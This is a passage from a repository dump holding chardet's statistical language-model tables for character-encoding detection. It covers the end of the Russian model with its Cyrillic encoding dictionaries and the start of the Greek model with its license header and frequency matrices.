2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,\n0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,\n0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,\n1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,\n1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,\n2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,\n1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,\n3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,\n1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,\n2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,\n1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,\n1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,\n1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,\n2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,\n1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,\n3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,\n1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,\n2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,\n1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,\n2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,\n0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,\n1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,\n1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,\n1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,\n3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,\n2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,\n3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,\n1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,\n1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,\n0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,\n2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,\n1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,\n1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,\n0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,\n1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,\n2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,\n2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,\n1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,\n1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,\n2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,\n1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,\n0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,\n2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,\n1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,\n1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,\n0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,\n0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,\n0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,\n1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,\n0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,\n1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,\n0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,\n1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,\n0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,\n2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,\n0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,\n)\n\nKoi8rModel = {\n  'char_to_order_map': KOI8R_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"KOI8-R\",\n  'language': 'Russian',\n}\n\nWin1251CyrillicModel = {\n  'char_to_order_map': win1251_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"windows-1251\",\n  'language': 'Russian',\n}\n\nLatin5CyrillicModel = {\n  'char_to_order_map': latin5_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"ISO-8859-5\",\n  'language': 'Russian',\n}\n\nMacCyrillicModel = {\n  'char_to_order_map': macCyrillic_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"MacCyrillic\",\n  'language': 'Russian',\n}\n\nIbm866Model = {\n  'char_to_order_map': IBM866_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"IBM866\",\n  'language': 'Russian',\n}\n\nIbm855Model = {\n  'char_to_order_map': IBM855_char_to_order_map,\n  'precedence_matrix': RussianLangModel,\n  'typical_positive_ratio': 0.976601,\n  'keep_english_letter': False,\n  'charset_name': \"IBM855\",\n  'language': 'Russian',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langgreekmodel.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# Character Mapping Table:\nLatin7_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85,  # 40\n 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253,  # 50\n253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55,  # 60\n 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253,  # 70\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 80\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 90\n253,233, 90,253,253,253,253,253,253,253,253,253,253, 74,253,253,  # a0\n253,253,253,253,247,248, 61, 36, 46, 71, 73,253, 54,253,108,123,  # b0\n110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39,  # c0\n 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15,  # d0\n124,  1, 29, 20, 21,  3, 32, 13, 25,  5, 11, 16, 10,  6, 30,  4,  # e0\n  9,  8, 14,  7,  2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253,  # f0\n)\n\nwin1253_char_to_order_map = (\n255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255,  # 00\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 10\n253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,  # 20\n252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253,  # 30\n253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85,  # 40\n 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253,  # 50\n253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55,  # 60\n 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253,  # 70\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 80\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,  # 90\n253,233, 61,253,253,253,253,253,253,253,253,253,253, 74,253,253,  # a0\n253,253,253,253,247,253,253, 36, 46, 71, 73,253, 54,253,108,123,  # b0\n110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39,  # c0\n 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15,  # d0\n124,  1, 29, 20, 21,  3, 32, 13, 25,  5, 11, 16, 10,  6, 30,  4,  # e0\n  9,  8, 14,  7,  2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253,  # f0\n)\n\n# Model Table:\n# total sequences: 100%\n# first 512 sequences: 98.2851%\n# first 1024 sequences:1.7001%\n# rest  sequences:     0.0359%\n# negative sequences:  0.0148%\nGreekLangModel = (\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0,\n3,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,0,3,3,0,3,2,3,3,0,3,2,3,3,3,0,0,3,0,3,0,3,3,2,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,\n0,2,3,2,2,3,3,3,3,3,3,3,3,0,3,3,3,3,0,2,3,3,0,3,3,3,3,2,3,3,3,0,\n2,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,2,1,3,3,3,3,2,3,3,2,3,3,2,0,\n0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,2,3,3,0,\n2,0,1,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,2,3,0,0,0,0,3,3,0,3,1,3,3,3,0,3,3,0,3,3,3,3,0,0,0,0,\n2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,0,3,0,3,3,3,3,3,0,3,2,2,2,3,0,2,3,3,3,3,3,2,3,3,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,3,2,2,2,3,3,3,3,0,3,1,3,3,3,3,2,3,3,3,3,3,3,3,2,2,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,2,0,3,0,0,0,3,3,2,3,3,3,3,3,0,0,3,2,3,0,2,3,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,3,3,3,3,0,0,3,3,0,2,3,0,3,0,3,3,3,0,0,3,0,3,0,2,2,3,3,0,0,\n0,0,1,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,2,0,3,2,3,3,3,3,0,3,3,3,3,3,0,3,3,2,3,2,3,3,2,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,2,3,2,3,3,3,3,3,3,0,2,3,2,3,2,2,2,3,2,3,3,2,3,0,2,2,2,3,0,\n2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,0,0,0,3,3,3,2,3,3,0,0,3,0,3,0,0,0,3,2,0,3,0,3,0,0,2,0,2,0,\n0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,0,0,0,3,3,0,3,3,3,0,0,1,2,3,0,\n3,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,2,0,0,3,2,2,3,3,0,3,3,3,3,3,2,1,3,0,3,2,3,3,2,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,3,0,2,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,3,0,3,2,3,0,0,3,3,3,0,\n3,0,0,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,0,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,2,0,3,2,3,0,0,3,2,3,0,\n2,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,1,2,2,3,3,3,3,3,3,0,2,3,0,3,0,0,0,3,3,0,3,0,2,0,0,2,3,1,0,\n2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,3,3,3,3,0,3,0,3,3,2,3,0,3,3,3,3,3,3,0,3,3,3,0,2,3,0,0,3,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,3,3,3,0,0,3,0,0,0,3,3,0,3,0,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,0,0,0,3,3,3,3,3,3,0,0,3,0,2,0,0,0,3,3,0,3,0,3,0,0,2,0,2,0,\n0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,3,0,3,0,2,0,3,2,0,3,2,3,2,3,0,0,3,2,3,2,3,3,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,0,0,2,3,3,3,3,3,0,0,0,3,0,2,1,0,0,3,2,2,2,0,3,0,0,2,2,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,3,3,3,2,0,3,0,3,0,3,3,0,2,1,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,3,3,3,0,3,3,3,3,3,3,0,2,3,0,3,0,0,0,2,1,0,2,2,3,0,0,2,2,2,0,\n0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,3,0,0,2,3,3,3,2,3,0,0,1,3,0,2,0,0,0,0,3,0,1,0,2,0,0,1,1,1,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,3,1,0,3,0,0,0,3,2,0,3,2,3,3,3,0,0,3,0,3,2,2,2,1,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,3,3,3,0,0,3,0,0,0,0,2,0,2,3,3,2,2,2,2,3,0,2,0,2,2,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,3,3,3,2,0,0,0,0,0,0,2,3,0,2,0,2,3,2,0,0,3,0,3,0,3,1,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,3,2,3,3,2,2,3,0,2,0,3,0,0,0,2,0,0,0,0,1,2,0,2,0,2,0,\n0,2,0,2,0,2,2,0,0,1,0,2,2,2,0,2,2,2,0,2,2,2,0,0,2,0,0,1,0,0,0,0,\n0,2,0,3,3,2,0,0,0,0,0,0,1,3,0,2,0,2,2,2,0,0,2,0,3,0,0,2,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,3,0,2,3,2,0,2,2,0,2,0,2,2,0,2,0,2,2,2,0,0,0,0,0,0,2,3,0,0,0,2,\n0,1,2,0,0,0,0,2,2,0,0,0,2,1,0,2,2,0,0,0,0,0,0,1,0,2,0,0,0,0,0,0,\n0,0,2,1,0,2,3,2,2,3,2,3,2,0,0,3,3,3,0,0,3,2,0,0,0,1,1,0,2,0,2,2,\n0,2,0,2,0,2,2,0,0,2,0,2,2,2,0,2,2,2,2,0,0,2,0,0,0,2,0,1,0,0,0,0,\n0,3,0,3,3,2,2,0,3,0,0,0,2,2,0,2,2,2,1,2,0,0,1,2,2,0,0,3,0,0,0,2,\n0,1,2,0,0,0,1,2,0,0,0,0,0,0,0,2,2,0,1,0,0,2,0,0,0,2,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,3,3,2,2,0,0,0,2,0,2,3,3,0,2,0,0,0,0,0,0,2,2,2,0,2,2,0,2,0,2,\n0,2,2,0,0,2,2,2,2,1,0,0,2,2,0,2,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,\n0,2,0,3,2,3,0,0,0,3,0,0,2,2,0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,0,2,\n0,0,2,2,0,0,2,2,2,0,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,2,0,0,3,2,0,2,2,2,2,2,0,0,0,2,0,0,0,0,2,0,1,0,0,2,0,1,0,0,0,\n0,2,2,2,0,2,2,0,1,2,0,2,2,2,0,2,2,2,2,1,2,2,0,0,2,0,0,0,0,0,0,0,\n0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,\n0,2,0,2,0,2,2,0,0,0,0,1,2,1,0,0,2,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,3,2,3,0,0,2,0,0,0,2,2,0,2,0,0,0,1,0,0,2,0,2,0,2,2,0,0,0,0,\n0,0,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,\n0,2,2,3,2,2,0,0,0,0,0,0,1,3,0,2,0,2,2,0,0,0,1,0,2,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,0,2,0,3,2,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n0,0,2,0,0,0,0,1,1,0,0,2,1,2,0,2,2,0,1,0,0,1,0,0,0,2,0,0,0,0,0,0,\n0,3,0,2,2,2,0,0,2,0,0,0,2,0,0,0,2,3,0,2,0,0,0,0,0,0,2,2,0,0,0,2,\n0,1,2,0,0,0,1,2,2,1,0,0,0,2,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,1,2,0,2,2,0,2,0,0,2,0,0,0,0,1,2,1,0,2,1,0,0,0,0,0,0,0,0,0,0,\n0,0,2,0,0,0,3,1,2,2,0,2,0,0,0,0,2,0,0,0,2,0,0,3,0,0,0,0,2,2,2,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,2,1,0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,2,\n0,2,2,0,0,2,2,2,2,2,0,1,2,0,0,0,2,2,0,1,0,2,0,0,2,2,0,0,0,0,0,0,\n0,0,0,0,1,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,0,0,2,\n0,1,2,0,0,0,0,2,2,1,0,1,0,1,0,2,2,2,1,0,0,0,0,0